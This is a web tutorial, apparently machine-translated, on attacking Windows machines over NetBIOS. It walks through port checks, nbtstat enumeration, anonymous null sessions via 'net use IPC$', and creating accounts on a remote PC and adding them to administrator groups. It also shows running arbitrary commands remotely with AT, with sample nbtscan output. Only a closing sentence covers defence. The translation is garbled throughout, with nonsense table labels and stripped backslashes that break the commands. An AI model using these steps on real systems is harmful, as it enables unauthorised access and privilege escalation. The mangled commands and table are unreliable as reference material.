Hacking with NetBIOS
This website will show different ways to get as much data as possible to a remote PC using NetBIOS.
The first thing is to check that the computer we want to connect to has the NetBIOS port open, the port is the 139; can be done using the MSDOS conqueue with this command: telnet ADDRESS 139 and if it connects it will have it open and if not, then look for another PC.
The second most important thing is to have the NetBios table, which will tell us which services the remote computer has running that we will check with the results obtained with subsequent commands
Name
|
Suffix
|
Guy
|
Service
|
<computername> |
00
|
Or
|
Workstation Service |
<computername> |
01
|
Or
|
Messenger Service |
<_MSBROWSE_> |
01
|
G
|
Master Browser |
<computername> |
03
|
Or
|
Messenger Service |
<computername> |
06
|
Or
|
RAS Server Service |
<computername> |
1F
|
Or
|
NetDDE Service |
<computername> |
20
|
Or
|
File Server Service |
<computername> |
21
|
Or
|
RAS Client Service |
<computername> |
22
|
Or
|
Exchange Interchange |
<computername> |
23
|
Or
|
Exchange Store |
<computername> |
24
|
Or
|
Exchange Directory |
<computername> |
30
|
Or
|
Modem Sharing Server Service |
<computername> |
31
|
Or
|
Modem Sharing Client Service |
<computername> |
43
|
Or
|
SMS Client Remote Control |
<computername> |
44
|
Or
|
SMS Admin Remote Control Tool |
<computername> |
45
|
Or
|
SMS Client Remote Chat |
<computername> |
46
|
Or
|
SMS Client Remote Transfer |
<computername> |
4C
|
Or
|
DEC Pathworks TCPIP Service |
<computername> |
52
|
Or
|
DEC Pathworks TCPIP Service |
<computername> |
87
|
Or
|
Exchange MTA |
<computername> |
6To
|
Or
|
Exchange IMC |
<computername> |
BEE
|
Or
|
Network Monitor Agent |
<computername> |
BF
|
Or
|
Network Monitor Apps |
<username> |
03
|
Or
|
Messenger Service |
<domain> |
00
|
G
|
Domain Name |
<domain> |
1B
|
Or
|
Domain Master Browser |
<domain> |
1C
|
G
|
Domain Controllers |
<domain> |
1D
|
Or
|
Master Browser |
<domain> |
1E
|
G
|
Browser Service Elections |
<INet~Services> |
1C
|
G
|
Internet Information Server |
<IS~Computer_name> |
00
|
Or
|
Internet Information Server |
With this MSDOS command we will be able to know which services the remote machine is running: nbtstat -A ADDRESS or nbtstat -a PCNAME. Apart from this he will also give us the address MAC In case we are interested.
![]() As we can see in the image, we make a NBTSTAT to an IP or PCNAME and gives us those results, that we compare them with the NetBIOS table and we will get juicy data as your user, to the domain that belongs… and if it were a Domain Controller we would see the services it runs. |
To establish what is called Null session, We have to run this command: net use DIRECCIONIPIPC$ “”/u:”” . What this command actually does is authenticate to the remote PC with the user Anonymous.
To authenticate to a remote computer with a specific user: net use ADDRESS /u:USERNAME PASSWORD or net use ADDRESSIPC$ /u:USERNAME PASSWORD or net use ADDRESSIPRESOURCE /u:USERNAME PASSWORD… Once authenticated to the remote host to view the contents of the folder you can do net view ADDRESS and we'll see the content via MSDOS, but you can also do, BEGINNING > EXECUTE and you put whatever you want: ADDRESSIP or IPADDRESS resource and will show you with the Windows Explorer window the content.
View Remote Time: net time ADDRESS
View Available Domains: Net View /Domain
View computers in a specific domain: Net View /Domain:BUJARRA
View the users in a team: Net User
View a user's details: Net User username
Create a user: net user username password /ADD (Ideal for creating a user on a remote PC with the AT command)
Delete a user: net user username /DELETE
View groups on a PC: Net Group
Put a user in a group: net group namegroupusername /ADD (Ideal for grouping Administrators into the user we have created remotely on a PC)
Remove a user from a group: Net Group NameGroup Username /DELETE
Command AT, to run things remotely. With the command en DIRECCIONIP we will see the scheduled tasks that your team has and with the command en DIRECCIONIP 21:30 /INTERACTIVE “MSDOS command to run on the remote PC”. In the previous command, the 21:30 it is the time at which I have set the MSDOS command to be executed that goes in quotation marks, so you can put any time, But first look better at what time it has!
The MS Windows Resource Kit Tool nltest.rar Displays the domain controllers for a particular domain, example:
C:>nltest /dclist:bujarra.com
List pof DCS in Domain bujarra.com
bujarra01
Interesting seriesto the program Nbtscan What he does is a 'nbtstat’ of an entire network at an impressive speed. Example:
C:>nbtscan 192.168.0.0/24
 Doing NBT name scan for addresses from 192.168.0.0/24
 IP address  NetBIOS Server  Server  User  MAC address
 —————————————————————————–
 192.168.0.0  Sendto failed: Cannot assign requested address
 192.168.0.1  BUJARRA01 <Server> <unknown> &NBSP00-E0-7D-78-11-E6
 192.168.0.13  MARIA <Server>  MARIA &NBSP00-E0-7D-76-5A-2B
 192.168.0.55  VICETOPC <Server>  VICETO 00-00-f8-30-fa-23
 192.168.0.100  Recvfrom failed: Connection reset by peer
For Protect ourselves of this type of attack we must either close the port 139 on the router, either we will enable the firewall in XP or we will remove the folder and printer sharing service for Microsoft networks (in any S.O. Microsoft's).